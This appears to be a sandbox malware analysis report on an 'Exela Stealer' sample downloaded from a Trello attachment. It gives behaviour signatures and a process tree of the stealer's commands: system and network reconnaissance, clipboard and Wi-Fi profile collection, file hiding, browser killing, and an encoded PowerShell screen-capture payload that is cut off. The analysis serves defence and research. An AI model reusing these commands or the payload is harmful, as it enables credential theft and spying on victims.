Analysis

  • max time kernel
    282s
  • max time network
    272s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240730-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-08-2024 06:33

General

  • Target

    https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip

Malware Config

Signatures

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd832646f8,0x7ffd83264708,0x7ffd83264718
      2⤵
        PID:3968
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
        2⤵
          PID:1524
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2956
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
          2⤵
            PID:1660
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
            2⤵
              PID:3172
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
              2⤵
                PID:1592
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                2⤵
                  PID:5024
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4852
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                  2⤵
                    PID:2308
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
                    2⤵
                      PID:3532
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
                      2⤵
                        PID:1064
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                        2⤵
                          PID:548
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3324 /prefetch:8
                          2⤵
                            PID:2880
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
                            2⤵
                              PID:2260
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2616
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3396
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:1504
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:2144
                                • C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe
                                  "C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe"
                                  1⤵
                                    PID:4632
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "ver"
                                      2⤵
                                        PID:4280
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                        2⤵
                                          PID:2996
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic path win32_VideoController get name
                                            3⤵
                                            • Detects videocard installed
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4536
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                          2⤵
                                            PID:1388
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get Manufacturer
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4148
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "gdb --version"
                                            2⤵
                                              PID:376
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist"
                                              2⤵
                                                PID:3432
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist
                                                  3⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1532
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                                2⤵
                                                  PID:232
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path Win32_ComputerSystem get Manufacturer
                                                    3⤵
                                                      PID:712
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    2⤵
                                                      PID:3988
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        3⤵
                                                          PID:868
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                                        2⤵
                                                          PID:2284
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist
                                                            3⤵
                                                            • Enumerates processes with tasklist
                                                            PID:4820
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
                                                          2⤵
                                                          • Hide Artifacts: Hidden Files and Directories
                                                          PID:4052
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
                                                            3⤵
                                                            • Views/modifies file attributes
                                                            PID:2064
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist"
                                                          2⤵
                                                            PID:1200
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist
                                                              3⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4928
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1352"
                                                            2⤵
                                                              PID:5024
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /F /PID 1352
                                                                3⤵
                                                                • Kills process with taskkill
                                                                PID:3432
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3968"
                                                              2⤵
                                                                PID:4796
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /F /PID 3968
                                                                  3⤵
                                                                  • Kills process with taskkill
                                                                  PID:376
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1524"
                                                                2⤵
                                                                  PID:1900
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    taskkill /F /PID 1524
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    PID:2880
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2956"
                                                                  2⤵
                                                                    PID:380
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      taskkill /F /PID 2956
                                                                      3⤵
                                                                      • Kills process with taskkill
                                                                      PID:4052
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1660"
                                                                    2⤵
                                                                      PID:3504
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /F /PID 1660
                                                                        3⤵
                                                                        • Kills process with taskkill
                                                                        PID:4824
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1592"
                                                                      2⤵
                                                                        PID:4748
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /F /PID 1592
                                                                          3⤵
                                                                          • Kills process with taskkill
                                                                          PID:1216
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 548"
                                                                        2⤵
                                                                          PID:2476
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /F /PID 548
                                                                            3⤵
                                                                            • Kills process with taskkill
                                                                            PID:4708
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2260"
                                                                          2⤵
                                                                            PID:1672
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /F /PID 2260
                                                                              3⤵
                                                                              • Kills process with taskkill
                                                                              PID:2724
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                            2⤵
                                                                              PID:1100
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd.exe /c chcp
                                                                                3⤵
                                                                                  PID:2996
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp
                                                                                    4⤵
                                                                                      PID:1988
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                  2⤵
                                                                                    PID:3060
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      cmd.exe /c chcp
                                                                                      3⤵
                                                                                        PID:3260
                                                                                        • C:\Windows\system32\chcp.com
                                                                                          chcp
                                                                                          4⤵
                                                                                            PID:2252
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                        2⤵
                                                                                          PID:4084
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FO LIST
                                                                                            3⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:3876
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                          2⤵
                                                                                          • Clipboard Data
                                                                                          PID:1524
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe Get-Clipboard
                                                                                            3⤵
                                                                                            • Clipboard Data
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:1660
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                          2⤵
                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                          PID:3144
                                                                                          • C:\Windows\system32\netsh.exe
                                                                                            netsh wlan show profiles
                                                                                            3⤵
                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                            PID:2372
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                          2⤵
                                                                                          • Network Service Discovery
                                                                                          PID:3176
                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                            systeminfo
                                                                                            3⤵
                                                                                            • Gathers system information
                                                                                            PID:1244
                                                                                          • C:\Windows\system32\HOSTNAME.EXE
                                                                                            hostname
                                                                                            3⤵
                                                                                              PID:3932
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic logicaldisk get caption,description,providername
                                                                                              3⤵
                                                                                              • Collects information from the system
                                                                                              PID:232
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net user
                                                                                              3⤵
                                                                                                PID:636
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 user
                                                                                                  4⤵
                                                                                                    PID:4536
                                                                                                • C:\Windows\system32\query.exe
                                                                                                  query user
                                                                                                  3⤵
                                                                                                    PID:2668
                                                                                                    • C:\Windows\system32\quser.exe
                                                                                                      "C:\Windows\system32\quser.exe"
                                                                                                      4⤵
                                                                                                        PID:3508
                                                                                                    • C:\Windows\system32\net.exe
                                                                                                      net localgroup
                                                                                                      3⤵
                                                                                                        PID:3184
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 localgroup
                                                                                                          4⤵
                                                                                                            PID:3140
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net localgroup administrators
                                                                                                          3⤵
                                                                                                            PID:4432
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 localgroup administrators
                                                                                                              4⤵
                                                                                                                PID:4280
                                                                                                            • C:\Windows\system32\net.exe
                                                                                                              net user guest
                                                                                                              3⤵
                                                                                                                PID:3908
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 user guest
                                                                                                                  4⤵
                                                                                                                    PID:3744
                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                  net user administrator
                                                                                                                  3⤵
                                                                                                                    PID:2508
                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                      C:\Windows\system32\net1 user administrator
                                                                                                                      4⤵
                                                                                                                        PID:2828
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic startup get caption,command
                                                                                                                      3⤵
                                                                                                                        PID:2476
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        tasklist /svc
                                                                                                                        3⤵
                                                                                                                        • Enumerates processes with tasklist
                                                                                                                        PID:2172
                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                        ipconfig /all
                                                                                                                        3⤵
                                                                                                                        • Gathers network information
                                                                                                                        PID:3048
                                                                                                                      • C:\Windows\system32\ROUTE.EXE
                                                                                                                        route print
                                                                                                                        3⤵
                                                                                                                          PID:3548
                                                                                                                        • C:\Windows\system32\ARP.EXE
                                                                                                                          arp -a
                                                                                                                          3⤵
                                                                                                                          • Network Service Discovery
                                                                                                                          PID:3612
                                                                                                                        • C:\Windows\system32\NETSTAT.EXE
                                                                                                                          netstat -ano
                                                                                                                          3⤵
                                                                                                                          • System Network Connections Discovery
                                                                                                                          • Gathers network information
                                                                                                                          PID:4448
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc query type= service state= all
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:208
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh firewall show state
                                                                                                                          3⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:4128
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh firewall show config
                                                                                                                          3⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:5000
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                        2⤵
                                                                                                                          PID:1392
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic csproduct get uuid
                                                                                                                            3⤵
                                                                                                                              PID:3872
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwB